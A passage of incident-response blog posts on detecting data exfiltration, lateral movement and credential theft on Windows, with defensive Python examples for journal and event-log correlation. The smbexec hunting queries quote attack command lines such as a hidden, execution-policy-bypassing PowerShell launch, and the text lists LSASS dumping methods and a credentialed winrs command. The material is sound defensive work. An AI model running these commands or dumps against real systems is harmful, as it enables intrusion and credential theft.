HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History\RemoteTarget
If WinSCP was run as a portable copy, the same settings live in a WinSCP.ini next to the executable instead of the registry.

3. RDP Exfiltration
Exfiltration through Remote Desktop Protocol (RDP) is challenging to detect, because Windows does not log which files leave through a redirected drive or the clipboard. RDP clients can map local drives into the remote session, where they appear as \\tsclient\<drive> (for example \\tsclient\C\); these UNC paths may appear in process creation events or command lines on the target. RDP bitmap cache parsing is a long shot when it comes to identifying exfiltration.

4. Rclone - The Ransomware Actor's Little Buddy
Rclone, a synchronization tool compatible with over 40 storage services, is often used by ransomware actors for data exfiltration. Adversaries usually do not rename rclone.exe or rclone.conf, which makes them easy to hunt: the configuration file defaults to %APPDATA%\rclone\rclone.conf and holds the remote definitions (provider and credentials), and command lines such as rclone copy or rclone sync with a remote name followed by a colon are a strong indicator. You can learn more about Rclone and its configuration file at https://rclone.org/docs/#config-config-file and see the list of providers at https://rclone.org/#providers

5. Power Consumption as a Detection Method
Data exfiltration can be associated with high power consumption: transferring data keeps the network interface and the transferring program busy. Tools like Rclone and MEGAsync may show up in the power efficiency reports stored under C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics. The SRUM database has also proven useful for power consumption analysis, which can help identify suspicious exfiltration activity. You can explore SRUM further in these posts:
SRUM: The Digital Detective in Windows
How to Use SRUMECmd to Parse and Analyze SRUDB.dat Files

6. MEGAsync IOCs
MEGAsync, another tool often used for exfiltration, leaves behind artifacts that aid an investigation:
Scheduled task name: \MEGA\MEGAsync Update Task
Config file (encrypted): %LOCALAPPDATA%\Mega Limited\MEGAsync\MEGAsync.cfg
Executable: %LOCALAPPDATA%\Mega Limited or %LOCALAPPDATA%\MEGAsync
Log files: %LOCALAPPDATA%\Mega Limited\MEGAsync\logs\
Registry setting: HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CLSID of Mega}\Instance\InitPropertyBag\TargetFolderPath

7. LockBit's StealBit Tool
LockBit ransomware operators have developed a custom exfiltration tool called StealBit, known for its efficiency and speed. For a deep dive into LockBit's arsenal and the StealBit tool, see Cybereason's threat analysis report.

9. Network-Based Exfiltration Detection
Network logs such as firewall and NetFlow records can help determine how much data was exfiltrated, but they do not reveal its content. Look for traffic spikes, off-hours activity and protocol tunneling (e.g., DNS) as indicators of potential exfiltration. Proving exactly which data left may be impossible, but tracking these indicators provides valuable leads for your investigation.
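The $UsnJrnl:$J reasoning in the staging section above is easiest to see on real records. The block below is an added example, not code from the original post: it takes $J records in the column shape that MFTECmd writes (update timestamp, file reference, name, parent path, update reasons), groups them by file reference so renames are followed, and reports every archive that was created, written and later deleted, the case where the $MFT no longer shows the file. The records and the set of names still present in the $MFT are constructed for the example.

```python
"""Find staged-then-deleted archives in a $UsnJrnl:$J export.

Added example, not from the original post. Records mirror MFTECmd's $J
columns: (UpdateTimestamp, FileReference "entry-sequence", Name, ParentPath,
UpdateReasons). Grouping by file reference keeps a file's history together
across renames. All records below are constructed.
"""
from collections import defaultdict
from datetime import datetime

ARCHIVE_EXT = (".zip", ".7z", ".rar", ".tar", ".gz")

# Constructed $J records: a zip staged in a temp folder, renamed to look like
# an update file, then deleted after the transfer; plus two benign files.
SAMPLE_J = [
    ("2024-03-02 01:02:10", "41233-5", "q3-finance.zip", r".\Users\Public\tmp", "FileCreate"),
    ("2024-03-02 01:02:11", "41233-5", "q3-finance.zip", r".\Users\Public\tmp", "DataExtend"),
    ("2024-03-02 01:05:43", "41233-5", "q3-finance.zip", r".\Users\Public\tmp", "DataExtend|Close"),
    ("2024-03-02 01:09:01", "41233-5", "q3-finance.zip", r".\Users\Public\tmp", "RenameOldName"),
    ("2024-03-02 01:09:01", "41233-5", "upd.dat", r".\Users\Public\tmp", "RenameNewName|Close"),
    ("2024-03-02 01:40:22", "41233-5", "upd.dat", r".\Users\Public\tmp", "FileDelete|Close"),
    ("2024-03-02 08:15:00", "9001-2", "report.docx", r".\Users\jdoe\Documents", "DataOverwrite|Close"),
    ("2024-03-02 09:00:00", "41500-1", "backup.7z", r".\Backups", "FileCreate|DataExtend|Close"),
]
# Names still present in the $MFT at collection time (constructed).
SAMPLE_MFT = {"report.docx", "backup.7z"}


def is_archive(name):
    return name.lower().endswith(ARCHIVE_EXT)


def find_staged_archives(records, mft_names):
    """Return one finding per file reference that ever carried an archive name.

    A finding with deleted set and in_mft False is the deleted-staging case
    that only the journal can show; lifetime_min is create-to-delete in minutes.
    """
    by_ref = defaultdict(list)
    for ts, ref, name, parent, reasons in records:
        by_ref[ref].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                            name, parent, set(reasons.split("|"))))
    findings = []
    for ref, rows in by_ref.items():
        rows.sort(key=lambda r: r[0])
        names = list(dict.fromkeys(r[1] for r in rows))  # name history, in order
        if not any(is_archive(n) for n in names):
            continue
        created = next((r[0] for r in rows if "FileCreate" in r[3]), None)
        deleted = next((r[0] for r in rows if "FileDelete" in r[3]), None)
        lifetime = (round((deleted - created).total_seconds() / 60, 1)
                    if created and deleted else None)
        findings.append({
            "ref": ref, "names": names, "path": rows[-1][2],
            "created": created, "deleted": deleted,
            "renamed": len(names) > 1,
            "in_mft": names[-1] in mft_names,
            "lifetime_min": lifetime,
        })
    findings.sort(key=lambda f: (f["in_mft"], f["ref"]))  # gone-from-MFT first
    return findings


if __name__ == "__main__":
    for f in find_staged_archives(SAMPLE_J, SAMPLE_MFT):
        state = "DELETED, not in $MFT" if not f["in_mft"] else "still on disk"
        print(f"{f['ref']}  {' -> '.join(f['names'])}  in {f['path']}  "
              f"created {f['created']}  {state}  lifetime {f['lifetime_min']} min")
```

Run against a real export, the interesting rows are the ones with a short lifetime, a rename away from an archive extension, and no surviving $MFT entry; the 38-minute window between FileCreate and FileDelete in the sample is the slot to search in the firewall and proxy logs for the transfer itself.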
Be vigilant, keep learning, stay safe.
Akash Patel

  • Lateral Movement in Cyber Attacks: Key Protocols, Tools, and Detection Methods

Lateral movement refers to how attackers move through a network after gaining initial access. It lets them explore the environment, escalate privileges and reach their final target, often sensitive data or critical systems. Lateral movement is hard to track because of the variety of methods used.

Common Lateral Movement Protocols

Server Message Block (SMB): file sharing over the network, and the transport for remote service control through the svcctl named pipe. Uses TCP 445 (direct SMB) and TCP 139 (SMB over the NetBIOS session service); the NetBIOS name and datagram services on UDP 137 and 138 support the latter.
Tools: PsExec (Sysinternals), smbexec (Impacket).
Event IDs to monitor:
5140: A network share object was accessed (5145 adds the individual file, which is how you spot a service binary written to ADMIN$).
4688/4689: Process creation and termination (Sysmon Event IDs 1 / 5).
7045/7036: Service installed and service state changes.

Remote Desktop Protocol (RDP): enables remote interactive access to systems. Attackers often add themselves to the "Remote Desktop Users" group. That is a built-in local group, so the change is logged as Event ID 4732 "A member was added to a security-enabled local group" (4728 is the global-group equivalent, which catches a domain group being populated before it is nested into the local one).
RDP Cached Bitmaps: RDP clients cache 64x64-pixel bitmap tiles on disk by default. These cached images can be collected and parsed for forensic analysis. I have created a complete blog post on analyzing RDP cached bitmaps (link below):
https://www.cyberengage.org/post/analyzing-and-extracting-bitmap-cache-files-from-rdp-sessions

Windows Remote Management (WinRM): Microsoft's implementation of the WS-Management protocol (HTTP on 5985, HTTPS on 5986). WinRS (Windows Remote Shell) is commonly used in ransomware campaigns. Monitoring: check for command lines such as winrs.exe -r:target /username:admin /password:pass. Tools like SharpSphere compromise vSphere infrastructure by talking to vCenter's web services API, a different channel from WinRM.

Windows Management Instrumentation (WMI): allows administrative tasks on remote systems. Often abused by ransomware operators to execute commands or transfer files.

Background Intelligent Transfer Service (BITS): designed for downloading files in the background. Attackers use BITS jobs for stealthy transfers and for task execution when a job completes.

Tools Commonly Used for Lateral Movement
Ransomware operators and threat actors use a variety of scanners to identify targets for lateral movement:
Advanced IP Scanner
Advanced Port Scanner
Angry IP Scanner
Cobalt Strike (built-in scanning capabilities)
KPort Scanner
nmap
Qfinder Pro
SoftPerfect Network Scanner

Detailed Protocol Insights

Server Message Block (SMB)
SMB is the primary lateral movement channel. PsExec, for instance, is a popular tool for running processes remotely. The PsExec process:
1. Opens an SMB session to the target.
2. Uploads PSEXESVC.exe to the ADMIN$ share.
3. Connects to the Service Control Manager (SCM) over the named pipe \\target\pipe\svcctl.
4. Calls CreateService with the uploaded PSEXESVC.exe as the ImagePath.
5. Calls StartService to run the service, then exchanges stdin/stdout/stderr with it over \PSEXESVC named pipes.
Detection:
File creations: monitor the creation of PSEXESVC.exe in %SystemRoot% on the target (Sysmon Event ID 11, or Security 5145 on the ADMIN$ share).
Registry key: EULA acceptance is stored at HKEY_USERS\[SID]\Software\Sysinternals\PsExec\EulaAccepted. This is written on the machine that ran psexec.exe, so look for it on the source host (the attacker's foothold), not on the target.
Caveat: the -r switch lets an operator rename the service and its binary, so do not key only on the string PSEXESVC. A 7045 whose ImagePath is a freshly written file in %SystemRoot%, preceded by a write to ADMIN$ from the same remote host, is the durable signal.
Additional reading on PsExec and smbexec: "Windows Lateral Movement with smb, psexec and alternatives":
https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/

Remote Desktop Protocol (RDP)
For RDP-based lateral movement:
Group membership: check Event ID 4732 (local group) and 4728 (global group) for users added to "Remote Desktop Users".
Bitmap cache: the RDP client stores bitmaps locally, which can be parsed with tools like RdpCacheStitcher, EnCase and BMC Tools. These reconstruct fragments of what was viewed during the session, potentially revealing sensitive information.

Detecting and Hunting Lateral Movement
Detecting PsExec activity:
Process creation events: Event IDs 4688/4689 (or Sysmon Event IDs 1/5).
Service creation: Event IDs 7045/7036 for PSEXESVC; file creations (Sysmon Event ID 11).
Registry monitoring: look for EULA acceptance on the source host.
File creations: track the creation of PSEXESVC.exe on the target.
Detecting smbexec activity: Lucene-based queries can help identify smbexec usage. For example:
• CommandLine:"powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass"
• CommandLine:("\\127.0.0.1\C$\__output" OR "127.0.0.1 AND __output")
• CommandLine:"%COMSPEC% AND /Q AND /c"
• CommandLine:"%COMSPEC%"
• FileName:("execute.bat OR __output")
• EventID:7045 AND ServiceName:"BTOBTO"
BTOBTO is smbexec's default service name and __output the file it redirects command output to; both are trivially changed in the source, so treat them as the start of a hunt rather than the whole of it.
To learn more about hunting for Impacket/smbexec, see Riccardo Ancarani's "Hunting for Impacket":
https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/

Ransomware Evolution: Expanding Beyond Windows
Ransomware groups are increasingly targeting non-Windows platforms, including Linux, macOS and virtualization platforms such as VMware vCenter, vSphere and ESXi.
Attacks on vSphere infrastructure: tools like SharpSphere allow attackers to gain control over vSphere. Attackers can list VMs, dump guest memory or execute code inside virtual machines.
Targeting ESXi servers: attackers exploit vulnerabilities in ESXi hosts to encrypt many VMs at once, including with custom Python scripts written for ESXi.
Ransomware-as-a-Service (RaaS) and ESXi payloads: RaaS platforms such as LockBit 3.0 and BlackBasta produce native ESXi ransomware payloads, making virtualized environments an easy target.

Incident Response and Forensics on Non-Windows Platforms
Manual artifact collection: before mid-2022, collecting forensic artifacts from ESXi and other Unix-like systems was mostly manual, which made it a time-consuming part of incident response.
Unix-like Artifacts Collector (UAC): developed by Thiago Canozzo Lahr, this tool automates the collection of system artifacts from many Unix-like operating systems, including ESXi, Linux and macOS, and improves the speed and consistency of incident response.
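The PsExec detection logic described above (a write to ADMIN$ followed within seconds by a service install of that same file) is worth having as code, because it still fires when the operator used psexec -r to rename the service. The block below is an added example, not code from the original post: it correlates Security 5145 events (which carry the share, the relative target name, the access mask and the source address) with System 7045 events (which carry the service name and ImagePath). The event dicts are constructed; in practice you would feed it parsed evtx rows or SIEM results.

```python
"""Correlate ADMIN$ file writes (5145) with service installs (7045) to
surface PsExec-style execution, renamed or not.

Added example, not from the original post. Assumes Detailed File Share
auditing is on (so 5145 exists) and events arrive as dicts; all records
below are constructed.
"""
from datetime import datetime, timedelta
import ntpath

WINDOW = timedelta(minutes=5)   # max gap between the file write and the service install
ACCESS_WRITE = 0x2              # 5145 AccessMask bit for WriteData / AddFile

# Constructed events: a stock PsExec run, a second run renamed with -r, and
# two benign rows (a local installer and a read-only ADMIN$ access).
SAMPLE_EVENTS = [
    {"ts": "2024-03-03 03:12:40", "id": 5145, "share": r"\\*\ADMIN$", "target": "PSEXESVC.exe",
     "access": "0x2", "src_ip": "10.10.5.23", "user": r"CORP\jdoe"},
    {"ts": "2024-03-03 03:12:41", "id": 7045, "service": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"ts": "2024-03-03 04:01:02", "id": 5145, "share": r"\\*\ADMIN$", "target": "wuauservx.exe",
     "access": "0x2", "src_ip": "10.10.5.23", "user": r"CORP\jdoe"},
    {"ts": "2024-03-03 04:01:03", "id": 7045, "service": "wuauservx",
     "image": r"%SystemRoot%\wuauservx.exe", "account": "LocalSystem"},
    {"ts": "2024-03-03 09:30:00", "id": 7045, "service": "VendorAgent",
     "image": r"C:\Program Files\Vendor\agent.exe", "account": "LocalSystem"},
    {"ts": "2024-03-03 10:00:00", "id": 5145, "share": r"\\*\ADMIN$",
     "target": r"System32\drivers\etc\hosts", "access": "0x1", "src_ip": "10.10.5.9", "user": r"CORP\ops"},
]


def _ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%d %H:%M:%S")


def correlate_psexec(events, window=WINDOW):
    """Pair each 7045 with a preceding ADMIN$ write of a file with the same
    base name inside `window`. Returns one hit per matched pair."""
    writes = [e for e in events
              if e["id"] == 5145
              and e["share"].upper().endswith("ADMIN$")
              and int(e["access"], 16) & ACCESS_WRITE]
    hits = []
    for svc in (e for e in events if e["id"] == 7045):
        image = svc["image"].strip('"')          # ImagePath without quoting; args not handled
        base = ntpath.basename(image).lower()
        in_windir_root = ntpath.dirname(image).lower() in ("%systemroot%", r"c:\windows")
        for w in writes:
            lag = (_ts(svc) - _ts(w)).total_seconds()
            if ntpath.basename(w["target"]).lower() == base and 0 <= lag <= window.total_seconds():
                hits.append({
                    "service": svc["service"], "image": image,
                    "src_ip": w["src_ip"], "user": w["user"], "lag_s": lag,
                    "image_in_windir_root": in_windir_root,
                    "renamed": base != "psexesvc.exe",   # True when -r was used
                })
    return hits


if __name__ == "__main__":
    for h in correlate_psexec(SAMPLE_EVENTS):
        tag = "renamed PsExec-style service" if h["renamed"] else "PsExec"
        print(f"{tag}: {h['service']} ({h['image']}) installed {h['lag_s']:.0f}s after "
              f"{h['user']} wrote it to ADMIN$ from {h['src_ip']}")
```

The VendorAgent row never matches because nothing with that base name was written to ADMIN$, and the hosts read is dropped by the access-mask check. Both real hits come from the same source address, which is the pivot for the next step: go to 10.10.5.23 and look for the EulaAccepted key and the psexec.exe process creation there.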
Learning Resources:
Leonard Savina's presentation (attached in the original post)
Thiago Canozzo Lahr's presentation (attached in the original post)
Conclusion: By covering the key protocols, tools, detection techniques and the latest ransomware trends, this blog gives a comprehensive picture of lateral movement and how to defend against it. Stay vigilant, and make sure to incorporate the detection strategies discussed to protect your network from lateral movement attacks.
Akash Patel
I have created a blog post and a PDF file which will help you investigate artifacts on the source system and the destination system. The PDF contains detection and analysis based on Event IDs as well as on file system artifacts; link below:
https://www.cyberengage.org/post/understanding-lateral-movement-in-cyber-attacks

  • Overview of the differences between various forensic artifacts:

LNK (Shortcut) Files: Windows shortcut files that contain metadata about the file or program they point to, such as the target's path, icon location, the target's creation and last-accessed times, and the volume and host it lived on. Windows creates them automatically under the user's Recent folder whenever a file is opened, so they are useful for understanding user behaviour, application usage patterns and potentially identifying executed files.

Prefetch Files: used by Windows to speed up the loading of frequently run programs. Each .pf file records the program's name and path, the files and directories it touched, a run count and its last run times (the last eight on Windows 8 and later). Valuable for identifying executed programs and establishing user activity patterns. Prefetch is disabled by default on Windows Server editions.

AMCACHE (Amcache.hve): a registry hive stored under C:\Windows\AppCompat\Programs that inventories executables and installed programs: path, size, version and publisher metadata, the SHA-1 of the first 31 MB of the file, and the time the entry was first written. It provides insight into which binaries existed on the system, including newly dropped ones, but it holds no execution counts or last-run times, and an entry alone does not prove the file ran.

Shimcache (AppCompatCache): kept in the SYSTEM hive, it records the full path and the last-modified ($STANDARD_INFORMATION) time of executables that ran or were browsed, even if they have since been deleted or moved. Windows 7 and 8 include an insert flag that indicates execution; Windows 10 dropped it, and no version records an execution count. Useful for identifying executables an attacker has tried to conceal or remove.
Notes for Shimcache:
- Entries are added for files that were executed and for executables that were merely browsed in File Explorer, so an entry does not by itself prove execution.
- Shimcache lives in kernel memory and is written to the registry only at shutdown or reboot. When collecting a triage image from a live system, the on-disk copy reflects the previous shutdown; anything since then exists only in memory, so record the system's uptime before interpreting it.
- Order of execution: the most recently executed or interacted-with files sit at the top of the cache. By sorting parsed output on the Line column you see the executables in chronological order of insertion, regardless of their file modification timestamps.

Jump Lists: a feature of the Windows taskbar and Start menu that gives quick access to recently or frequently used files and programs. They store file names, paths, timestamps and usage frequency per application, which helps reconstruct user activity, identify accessed files and understand user preferences and behaviour.

Shell Bags: registry structures that record which folders the user browsed, including folder view settings and the last time a folder was visited or updated; they survive the deletion of the folder itself.

  • Strengthening Defense: Securing Privileged Accounts Against Advanced Attack Tactics

    In the realm of cybersecurity, privileged accounts are among the areas most targeted by adversaries. These accounts hold elevated permissions, making them high-value targets for threat actors, especially in the context of ransomware operations. Privilege escalation and credential access are two key tactics adversaries use to gain control over systems.

    1. Understanding Privilege Escalation and Credential Access

    Privilege Escalation (TA0004)
    Privilege escalation involves an adversary attempting to gain elevated permissions on a system. These elevated privileges enable them to execute commands, install malware, and move laterally across the network.

    Credential Access (TA0006)
    Credential access refers to the methods adversaries use to obtain account credentials. These credentials can grant them unauthorized access to systems and data. The most valuable targets are accounts with administrative privileges, such as Domain Admin (DA), Enterprise Admin (EA), and Schema Admin (SA). Attackers focus on stealing these credentials to gain control over the Active Directory (AD) environment.

    2. Best Practices for Securing Privileged Accounts

    Securing privileged accounts is crucial for minimizing the impact of privilege escalation and credential access attacks. Here are actionable steps to protect these high-privilege accounts:

    Use Non-Privileged Accounts for Everyday Use
    Administrators should always use their personal, non-privileged accounts for routine tasks. Elevated accounts, like DA and EA, should only be activated when absolutely necessary and promptly disabled afterward.

    Enable Windows Defender Credential Guard
    Credential Guard is a critical feature that helps protect credentials stored in memory from being stolen. While it’s recommended to enable it across all servers, at the very least it should be activated on critical systems like Domain Controllers (DCs). Learn more about setting up Credential Guard: https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure?tabs=intune

    Utilize the Protected Users Group
    Place all service accounts, admin accounts, and high-privilege accounts (DA/EA/SA) into the Protected Users group in AD. This limits their exposure to attacks. Learn more about the Protected Users group: https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group

    Service Account Privileges
    Service accounts should only have the minimum privileges required for their function. Be wary of vendor recommendations suggesting excessive privileges for their service accounts. Challenge them and ensure security is prioritized.

    Avoid Over-Privileged Service Accounts
    Do not allow vendors to dictate security within your organization by granting over-privileged access to their service accounts. Many ransomware incidents stem from the abuse of such accounts.

    3. Local Administrator Password Solution (LAPS)

    Microsoft offers a free solution known as Local Administrator Password Solution (LAPS), which is vital for managing local administrator accounts securely. By deploying LAPS, you can significantly reduce the risk of ransomware and other types of attacks that target local admin accounts. Learn more about LAPS: https://www.microsoft.com/en-us/download/details.aspx?id=46899

    4. Mitigating Attacks on LSASS and NTDS.dit

    LSASS (Local Security Authority Server Service)
    LSASS is responsible for handling authentication requests in Windows environments, and it stores credentials in memory. Threat actors often try to dump the LSASS process to extract these credentials. Some common methods used are:
    Task Manager Dump: A straightforward method where attackers use Task Manager to create a dump file of the LSASS process.
    SysInternals Process Explorer: This tool provides more sophisticated methods for LSASS dumping.
    PowerSploit’s Out-MiniDump Cmdlet: A PowerShell command that facilitates LSASS dumping.
    You can create an alert for the creation of lsass.dmp files.

    NTDS.dit
    The NTDS.dit file is the Active Directory database file. Attackers frequently attempt to steal this file from Domain Controllers. Monitoring file creation events (e.g., Sysmon Event ID 11) and analyzing MFT/UsnJrnl data can help detect unauthorized NTDS.dit access. Focus on hunting for instances where this file exists anywhere other than its proper location, C:\Windows\NTDS\NTDS.dit.

    5. Addressing UAC Bypass Techniques

    User Account Control (UAC) is designed to prevent unauthorized changes by prompting users for consent. However, malware families like Emotet have built-in UAC bypass capabilities, while other tools require attackers to bypass UAC manually. UAC is a valuable layer of security, but it is not foolproof, and organizations should implement additional controls to mitigate the risks of privilege escalation.

    Example of UAC: If a user is an administrator on a host, they will receive a UAC-driven prompt that reads, “Do you want to allow this app to make changes to your device?” You are most likely familiar with this dialog box and its Yes/No buttons.

    6. Final Thoughts: Leveraging Tools to Secure Your Environment

    To further enhance security, consider adopting Privileged Access Management (PAM) solutions such as BeyondTrust. Additionally, tools like Microsoft LAPS, Credential Guard, and SysInternals can be valuable assets in defending against privilege escalation and credential access attacks. By implementing these best practices, you can reduce the likelihood of ransomware infections and protect your organization from being compromised by advanced attack tactics.

    Akash Patel
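    As an added example (not part of the original article), the two hunts from section 4, lsass.dmp creation and NTDS.dit outside C:\Windows\NTDS, expressed as a small triage over Sysmon Event ID 11 (FileCreate) records. The records are constructed for illustration, the field names follow Sysmon's Image and TargetFilename, and treating any .dmp named after lsass as a dump is a heuristic assumption, since tools other than Task Manager choose their own dump file names.

```python
"""Triage Sysmon Event ID 11 (FileCreate) records for LSASS dumps and
stray NTDS.dit copies, as described in section 4 of the article."""
from pathlib import PureWindowsPath

# The only location where the AD database legitimately lives on a DC.
NTDS_HOME = PureWindowsPath(r"C:\Windows\NTDS")


def classify(event):
    """Return a finding string for one FileCreate record, or None if benign.

    event: dict with the Sysmon field names EventID, Image, TargetFilename.
    """
    if event.get("EventID") != 11:
        return None
    target = PureWindowsPath(event["TargetFilename"])
    name = target.name.lower()
    # Task Manager writes lsass.DMP; other dumpers vary the file name, so
    # treat any .dmp whose name starts with "lsass" as suspicious (heuristic).
    if name.startswith("lsass") and name.endswith(".dmp"):
        return f"LSASS dump: {target} written by {event['Image']}"
    # NTDS.dit anywhere except its home directory is a likely staging copy.
    # PureWindowsPath compares case-insensitively, as NTFS does.
    if name == "ntds.dit" and target.parent != NTDS_HOME:
        return f"NTDS.dit outside {NTDS_HOME}: {target} written by {event['Image']}"
    return None


def hunt(events):
    """Run classify() over a batch of records and return only the findings."""
    return [finding for finding in map(classify, events) if finding]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\System32\lsass.exe",
     "TargetFilename": r"C:\Windows\NTDS\ntds.dit"},                # expected location
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 11, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "TargetFilename": r"C:\Temp\Active Directory\ntds.dit"},
    {"EventID": 1, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Temp\lsass.dmp"},                        # not a FileCreate event
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

    The MFT/UsnJrnl check the article mentions covers the same file names once an endpoint has no Sysmon telemetry; the classification logic is identical, only the record source differs.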

  • Analyzing and Extracting Bitmap Cache Files from RDP Sessions

    When dealing with Remote Desktop Protocol (RDP) sessions on Windows, one of the often overlooked yet valuable artifacts is the RDP bitmap cache. This cache, designed to enhance performance by storing screen sections that rarely change, can be crucial in forensic investigations.

    Understanding the Purpose of RDP Bitmap Cache Files

    The primary purpose of the RDP bitmap cache is to improve performance by caching screen sections that change infrequently. Instead of redrawing the same portions of the screen multiple times during a session, the cache allows the system to pull the image from local storage. This leads to a smoother and more efficient user experience, especially in sessions where certain parts of the screen remain static.

    From a forensic perspective, however, these cached files can be a goldmine of information. By extracting and analyzing the bitmap cache, forensic analysts can potentially uncover information such as file names, icons, and partial screen contents from an RDP session.

    Location of Cache Files

    The cache files are stored in the user profile directory, and their location varies depending on the version of Windows:
    Windows 7 and later: C:\Users\[user]\AppData\Local\Microsoft\Terminal Server Client\Cache\*
    Pre-Windows 7: C:\Documents and Settings\[user]\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache\*
    Each user profile on a Windows machine has its own cache files in the respective directory. These files contain the cached bitmap data from RDP sessions, making them valuable for forensic analysis.

    Extracting and Analyzing Bitmap Cache Files

    Several tools are available for extracting and analyzing these bitmap cache files.

    BMC Tools
    Description: BMC Tools is a free and open-source Python script that extracts and analyzes cached bitmap files. It's a powerful tool for forensic investigations, allowing analysts to reconstruct parts of the screen from an RDP session. However, BMC Tools does not automatically reassemble the complete screen. The output after running the tool looks like the screenshot below.
    Usage: After extracting the cache files using BMC Tools, forensic analysts can manually analyze and piece together the images. The tool's output can help uncover significant details, but it requires careful examination to reconstruct meaningful visuals.
    GitHub Repository: https://github.com/ANSSI-FR/bmc-tools

    EnCase Script - "RDP Cached Bitmap Extractor"
    Description: This script, compatible with the commercial EnCase forensic software, allows for the extraction of cached bitmap images. EnCase is a widely used tool in forensic investigations, and this script integrates seamlessly with its ecosystem.
    Usage: Using this script within EnCase, analysts can extract and analyze bitmap cache files. However, it requires a licensed copy of EnCase, which may be a limitation for some forensic teams.
    Limitation: EnCase's script also doesn't reassemble the full screen, but it provides a robust framework for extracting and working with cached data.

    RdpCacheStitcher
    Description: This tool, developed by the Bundesamt für Sicherheit in der Informationstechnik (BSI), provides a user interface for manually creating collages from the output of tools like BMC Tools. It's a useful tool for visualizing and manually piecing together cached bitmap files.
    Usage: After extracting images with tools like BMC Tools, RdpCacheStitcher allows analysts to arrange and stitch these images into a coherent collage. The interface simplifies the manual reconstruction process.
    GitHub Repository: https://github.com/BSI-Bund/RdpCacheStitcher

    BriMor Labs’ “rdpieces”
    Description: rdpieces is a Perl script designed to automatically rebuild screenshots from cached bitmap files. It attempts to automate the tedious process of piecing together bitmap fragments, potentially saving time for forensic analysts.
    Usage: While not perfect, rdpieces offers a more automated approach to reconstructing screens from cached data. However, the accuracy of the reconstruction may vary depending on the complexity of the cached files.
    GitHub Repository: https://github.com/brimorlabs/rdpieces?tab=readme-ov-file
    Output: (screenshot of rdpieces output)

    Challenges in Reassembly

    One of the significant challenges in working with RDP bitmap cache files is reassembling the images. The cache files aren't written in a linear or predictable order: factors such as mouse movement or screen changes affect the order in which tiles are cached. As a result, reconstructing a complete image from these cached tiles is often compared to solving a jigsaw puzzle. While tools like rdpieces attempt to automate this process, the reconstruction isn't always perfect. Forensic analysts must often rely on manual intervention to piece together significant details such as file names, desktop icons, and portions of the screen background.

    Conclusion

    The extraction and analysis of bitmap cache files from RDP sessions offer a unique avenue for forensic investigation. Tools like BMC Tools, RdpCacheStitcher, and rdpieces provide a range of options for working with these cached images, each with its strengths and limitations. While automated reconstruction is challenging, these tools, combined with manual analysis, can help forensic investigators uncover valuable insights from RDP sessions.

    Akash Patel
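    As an added example, not code from the original article or from any of the tools it lists, the first step an analyst takes before stitching, laying the extracted tiles out in cache order on one contact sheet so gaps and out-of-order tiles are visible, written in plain Python with no imaging library. Tiles are assumed to be equal-sized lists of (r, g, b) pixel rows, the sample tiles are constructed solid-colour squares rather than real extractor output, and the BMP writer is a minimal 24-bit encoder.

```python
"""Lay out RDP bitmap-cache tiles in cache order as a contact-sheet BMP.

A tile is a list of `tile_h` rows, each a list of `tile_w` (r, g, b) pixels,
the one-bitmap-per-cache-entry shape that extractors such as BMC Tools yield."""
import struct


def make_collage(tiles, tile_w, tile_h, columns):
    """Place tiles left-to-right, top-to-bottom in the order they were cached.

    Returns (width, height, canvas); canvas is a top-down list of pixel rows.
    Unused grid cells stay black so holes in the cache stand out to the analyst.
    """
    rows = -(-len(tiles) // columns)                 # ceiling division
    width, height = columns * tile_w, rows * tile_h
    canvas = [[(0, 0, 0)] * width for _ in range(height)]
    for idx, tile in enumerate(tiles):
        ox, oy = (idx % columns) * tile_w, (idx // columns) * tile_h
        for y, row in enumerate(tile):
            canvas[oy + y][ox:ox + tile_w] = row
    return width, height, canvas


def encode_bmp(width, height, canvas):
    """Serialise a canvas as an uncompressed 24-bit BMP (bottom-up rows)."""
    pad = (4 - (width * 3) % 4) % 4                  # rows are 4-byte aligned
    pixels = bytearray()
    for row in reversed(canvas):                     # BMP stores the bottom row first
        for r, g, b in row:
            pixels += bytes((b, g, r))               # BMP pixel order is BGR
        pixels += b"\x00" * pad
    file_header = struct.pack("<2sIHHI", b"BM", 54 + len(pixels), 0, 0, 54)
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                             len(pixels), 2835, 2835, 0, 0)
    return bytes(file_header + dib_header + pixels)


def solid_tile(rgb, tile_w, tile_h):
    """Constructed stand-in for an extracted cache tile (one flat colour)."""
    return [[rgb] * tile_w for _ in range(tile_h)]


# Constructed sample: five 4x4 tiles, stitched four per row -> 16x8 sheet.
SAMPLE_TILES = [solid_tile(c, 4, 4) for c in
                [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), (255, 0, 255)]]

if __name__ == "__main__":
    w, h, sheet = make_collage(SAMPLE_TILES, 4, 4, columns=4)
    with open("collage.bmp", "wb") as fh:
        fh.write(encode_bmp(w, h, sheet))
```

    Reordering the tile list before calling make_collage is the manual "jigsaw" step the article describes; the sheet itself only makes the cache order visible.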
